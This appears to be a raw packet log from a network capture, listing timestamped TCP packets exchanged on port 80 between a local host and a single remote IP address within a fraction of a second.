Jan 10, 2025 19:12:29.094518900 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.094527006 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.094535112 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.094562054 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.094563961 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.094573975 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.094584942 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.094597101 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.094635010 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.094635010 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.094657898 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.094670057 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.094681025 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.094693899 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.094708920 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.094716072 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.094775915 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.094775915 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.094775915 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.094794989 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.094808102 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.094819069 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.094830990 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.094841003 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.094971895 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.095119953 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.095132113 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.095144033 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.095170975 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.095180988 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.095192909 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.095206022 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.095218897 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.095222950 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.095222950 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.095263004 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.095277071 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.095303059 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.095319986 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.095335007 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.095350981 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.095354080 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.095362902 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.095364094 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.095376015 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.095386982 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.095400095 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.095400095 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.095412016 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.095427036 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.095444918 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.095455885 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.095463037 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.095468998 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.095510006 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.095510006 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.095602989 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.095616102 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.095626116 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.095644951 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.095645905 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.095659018 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.095669985 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.095689058 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.095694065 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.095694065 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.095700979 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.095715046 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.095731020 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.095741987 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.095761061 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.095774889 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.095787048 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.095793009 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.095798969 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.095810890 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.095823050 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.095832109 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.095832109 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.095835924 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.095849991 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.095858097 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.095900059 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.095900059 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.095983982 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.095995903 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.096008062 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.096020937 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.096035004 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.096048117 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.096071959 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.096084118 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.096096992 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.096116066 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.096116066 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.096134901 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.096204042 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.096216917 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.096229076 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.096240997 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.096252918 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.096259117 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.096259117 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.096265078 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.096277952 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.096291065 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.096292019 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.096317053 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.096317053 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.096340895 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.096483946 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.096503019 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.096513987 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.096525908 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.096538067 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.096549034 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.096554041 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.096554041 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.096560955 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.096575022 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.096575022 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.096587896 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.096592903 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.096600056 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.096613884 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.096647978 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.096647978 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.096669912 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.096682072 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.096693993 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.096740007 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.096740007 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.096772909 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.096785069 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.096796989 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.096808910 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.096822023 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.096826077 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.096833944 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.096869946 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.096869946 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.096960068 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.096971989 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.096983910 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.096997023 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.097007036 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.097009897 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.097022057 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.097034931 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.097047091 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.097057104 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.097057104 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.097059011 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.097070932 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.097084999 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.097104073 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.097104073 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.097130060 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.097141027 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.097151995 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.097183943 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.097187042 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.097196102 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.097242117 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.097242117 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.097279072 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.097300053 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.097312927 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.097322941 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.097337008 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.097348928 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.097351074 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.097377062 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.097393036 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.097881079 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.097903013 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.097913980 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.097933054 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.097933054 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.097944021 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.097951889 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.097984076 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.098002911 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.098005056 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.098020077 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.098027945 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.098030090 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.098082066 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.098082066 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.184923887 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.184941053 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.184953928 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.184968948 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.185008049 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.185029030 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.185050011 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.185058117 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.185070038 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.185082912 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.185115099 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.185115099 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.185132980 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.185134888 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.185147047 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.185159922 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.185159922 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.185159922 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.185182095 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.185199022 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.185234070 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.185245991 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.185260057 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.185271025 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.185285091 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.185288906 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.185317993 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.185343027 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.185343027 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.185400009 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.185427904 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.185439110 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.185451984 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.185463905 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.185477972 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.185482979 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.185488939 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.185499907 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.185512066 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.185512066 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.185513020 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.185528040 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.185534000 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.185540915 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.185559034 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.185576916 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.185683966 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.185703039 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.185714960 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.185730934 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.185751915 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.185753107 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.185779095 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.185794115 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.185795069 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.185795069 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.185806990 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.185821056 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.185852051 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.185852051 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.185859919 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.185869932 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.185882092 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.185884953 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.185902119 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.185913086 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.185916901 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.185916901 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.185924053 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.185960054 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.185967922 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.185967922 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.185971975 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.185991049 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.186091900 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.186100960 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.186105013 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.186116934 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.186130047 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.186141968 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.186153889 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.186168909 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.186168909 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.186194897 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.186202049 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.186218023 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.186260939 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.186264038 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.186271906 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.186281919 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.186294079 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.186321020 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.186321020 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.186350107 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.186427116 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.186438084 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.186450958 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.186461926 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.186470985 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.186474085 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.186485052 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.186491013 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.186494112 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.186497927 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.186511040 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.186521053 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.186531067 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.186536074 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.186577082 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.186577082 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.186609983 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.186620951 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.186626911 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.186631918 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.186686039 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.186709881 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.186728954 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.186741114 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.186753035 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.186765909 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.186775923 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.186788082 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.186800003 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.186814070 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.186814070 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.186832905 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.186851025 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.186881065 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.186892033 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.186903954 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.186916113 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.186922073 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.186959982 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.187011957 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.187047958 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.187060118 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.187069893 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.187082052 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.187094927 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.187119961 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.187119961 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.187134027 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.187200069 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.187211037 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.187221050 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.187233925 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.187241077 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.187244892 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.187257051 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.187267065 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.187278032 CET	80	49726	104.21.75.48	192.168.2.11
